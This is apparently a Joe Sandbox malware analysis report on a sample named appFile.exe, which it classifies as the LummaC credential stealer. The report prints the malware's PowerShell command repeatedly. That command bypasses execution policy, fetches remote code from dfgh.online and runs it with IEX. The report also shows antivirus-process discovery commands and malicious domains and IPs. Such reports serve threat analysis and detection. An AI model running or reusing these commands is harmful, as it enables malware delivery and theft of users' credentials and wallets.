Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
appFile.exe

Overview

General Information

Sample name:appFile.exe
Analysis ID:1581281
MD5:7c498eca1b725e8a85fef298184ccbb9
SHA1:77ce8a334475d9469c43f668b6b09feb04768500
SHA256:d385d42cc611f7964ea583e10d991118f91456e88d76b3be14c047e4acdaab5c
Tags:exeuser-zhuzhu0009
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Drops PE files with a suspicious file extension
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • appFile.exe (PID: 6468 cmdline: "C:\Users\user\Desktop\appFile.exe" MD5: 7C498ECA1B725E8A85FEF298184CCBB9)
    • cmd.exe (PID: 6584 cmdline: "C:\Windows\System32\cmd.exe" /c move Shore Shore.cmd & Shore.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6852 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6872 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7000 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6988 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7080 cmdline: cmd /c md 723356 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 2872 cmdline: extrac32 /Y /E Guitar MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 4284 cmdline: findstr /V "Principle" Portions MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 980 cmdline: cmd /c copy /b ..\Requirements + ..\Ul + ..\Pupils + ..\Vista + ..\Sound + ..\Shelf F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Ted.com (PID: 4348 cmdline: Ted.com F MD5: 62D09F076E6E0240548C2F837536A46A)
        • powershell.exe (PID: 7032 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 2180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • S25734VPZD3VQL5I0DLUI2DAUAHZO.exe (PID: 3412 cmdline: "C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe" MD5: 1EBAB72F39900F4DB9D82A4850B32ABD)
          • S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp (PID: 2000 cmdline: "C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp" /SL5="$4041A,11205210,845824,C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe" MD5: A62041070E18901131CBBE7825EC4EC7)
            • S25734VPZD3VQL5I0DLUI2DAUAHZO.exe (PID: 6948 cmdline: "C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe" /VERYSILENT MD5: 1EBAB72F39900F4DB9D82A4850B32ABD)
              • S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp (PID: 6944 cmdline: "C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp" /SL5="$5041A,11205210,845824,C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe" /VERYSILENT MD5: A62041070E18901131CBBE7825EC4EC7)
                • timeout.exe (PID: 6972 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
                  • conhost.exe (PID: 2792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • cmd.exe (PID: 3912 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 2496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 3652 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 412 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 1464 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 2024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 7036 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 3672 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 2020 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 2008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 1344 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 1900 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 5660 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 4444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 1456 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 5916 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 4428 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 6704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 6612 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 6980 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 6568 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 1072 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 2680 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • vsv_tool.exe (PID: 2136 cmdline: "C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe" MD5: C12ED31F29EF510393AE36661F44F102)
      • choice.exe (PID: 2896 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: PowerShell Download and Execution Cradles
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Ted.com F, ParentImage: C:\Users\user\AppData\Local\Temp\723356\Ted.com, ParentProcessId: 4348, ParentProcessName: Ted.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 7032, ProcessName: powershell.exe
      Sigma detected: Suspicious PowerShell Parameter Substring
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Ted.com F, ParentImage: C:\Users\user\AppData\Local\Temp\723356\Ted.com, ParentProcessId: 4348, ParentProcessName: Ted.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 7032, ProcessName: powershell.exe
      Sigma detected: Change PowerShell Policies to an Insecure Level
      Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Ted.com F, ParentImage: C:\Users\user\AppData\Local\Temp\723356\Ted.com, ParentProcessId: 4348, ParentProcessName: Ted.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 7032, ProcessName: powershell.exe
      Sigma detected: PowerShell Web Download
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Ted.com F, ParentImage: C:\Users\user\AppData\Local\Temp\723356\Ted.com, ParentProcessId: 4348, ParentProcessName: Ted.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 7032, ProcessName: powershell.exe
      Sigma detected: Usage Of Web Request Commands And Cmdlets
      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Ted.com F, ParentImage: C:\Users\user\AppData\Local\Temp\723356\Ted.com, ParentProcessId: 4348, ParentProcessName: Ted.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 7032, ProcessName: powershell.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Ted.com F, ParentImage: C:\Users\user\AppData\Local\Temp\723356\Ted.com, ParentProcessId: 4348, ParentProcessName: Ted.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 7032, ProcessName: powershell.exe

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Sigma detected: Search for Antivirus process
      Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Shore Shore.cmd & Shore.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6584, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 6988, ProcessName: findstr.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-27T10:21:25.561664+010020283713Unknown Traffic192.168.2.449733104.21.94.92443TCP
      2024-12-27T10:21:30.682504+010020283713Unknown Traffic192.168.2.449737104.21.94.92443TCP
      2024-12-27T10:21:35.030514+010020283713Unknown Traffic192.168.2.449738104.21.94.92443TCP
      2024-12-27T10:21:37.289098+010020283713Unknown Traffic192.168.2.449739104.21.94.92443TCP
      2024-12-27T10:21:39.456880+010020283713Unknown Traffic192.168.2.449740104.21.94.92443TCP
      2024-12-27T10:21:41.870553+010020283713Unknown Traffic192.168.2.449741104.21.94.92443TCP
      2024-12-27T10:21:43.903017+010020283713Unknown Traffic192.168.2.449742104.21.94.92443TCP
      2024-12-27T10:21:45.964411+010020283713Unknown Traffic192.168.2.449743104.21.94.92443TCP
      2024-12-27T10:21:48.855903+010020283713Unknown Traffic192.168.2.449744185.161.251.21443TCP
      2024-12-27T10:21:50.970420+010020283713Unknown Traffic192.168.2.449745172.67.214.186443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-27T10:21:29.417050+010020546531A Network Trojan was detected192.168.2.449733104.21.94.92443TCP
      2024-12-27T10:21:33.528237+010020546531A Network Trojan was detected192.168.2.449737104.21.94.92443TCP
      2024-12-27T10:21:46.738072+010020546531A Network Trojan was detected192.168.2.449743104.21.94.92443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-27T10:21:29.417050+010020498361A Network Trojan was detected192.168.2.449733104.21.94.92443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-27T10:21:33.528237+010020498121A Network Trojan was detected192.168.2.449737104.21.94.92443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-27T10:21:51.853713+010020084381A Network Trojan was detected172.67.214.186443192.168.2.449745TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-27T10:21:44.701886+010020480941Malware Command and Control Activity Detected192.168.2.449742104.21.94.92443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for URL or domain
      Source: https://klipsyzogey.shop/int_clp_sha.txtAvira URL Cloud: Label: malware
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exeReversingLabs: Detection: 13%
      Multi AV Scanner detection for submitted file
      Source: appFile.exeVirustotal: Detection: 14%Perma Link
      Source: appFile.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 104.21.94.92:443 -> 192.168.2.4:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.94.92:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.94.92:443 -> 192.168.2.4:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.94.92:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.94.92:443 -> 192.168.2.4:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.94.92:443 -> 192.168.2.4:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.94.92:443 -> 192.168.2.4:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.94.92:443 -> 192.168.2.4:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.214.186:443 -> 192.168.2.4:49745 version: TLS 1.2
      Source: appFile.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: umdmxfrm.pdb source: appFile.exe
      Source: Binary string: msdadc.pdb source: appFile.exe
      Source: Binary string: WalletProxy.pdb source: appFile.exe
      Source: Binary string: mprext.pdbGCTL source: appFile.exe
      Source: Binary string: msvfw32.pdb source: appFile.exe
      Source: Binary string: msident.pdbGCTL source: appFile.exe
      Source: Binary string: odpdx32.pdbGCTL source: appFile.exe
      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: appFile.exe
      Source: Binary string: WSClient.pdbGCTL source: appFile.exe
      Source: Binary string: ws2help.pdb source: appFile.exe
      Source: Binary string: winsockai.pdbGCTL source: appFile.exe
      Source: Binary string: ODBCCR32.pdb source: appFile.exe
      Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000010.00000002.2149016419.0000000002DCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2149016419.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: api-ms-win-core-shutdown-l1-1-0.pdb source: appFile.exe
      Source: Binary string: mscat32.pdb source: appFile.exe
      Source: Binary string: UserDataLanguageUtil.pdb source: appFile.exe
      Source: Binary string: mprext.pdb source: appFile.exe
      Source: Binary string: msctfui.pdb source: appFile.exe
      Source: Binary string: appxprovisionpackage.pdb source: appFile.exe
      Source: Binary string: hnetmon.pdb source: appFile.exe
      Source: Binary string: CHxReadingStringIME.pdb source: appFile.exe
      Source: Binary string: mscpxl32.pdb source: appFile.exe
      Source: Binary string: msdaenum.pdbGCTL source: appFile.exe
      Source: Binary string: cmifw.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: appFile.exe
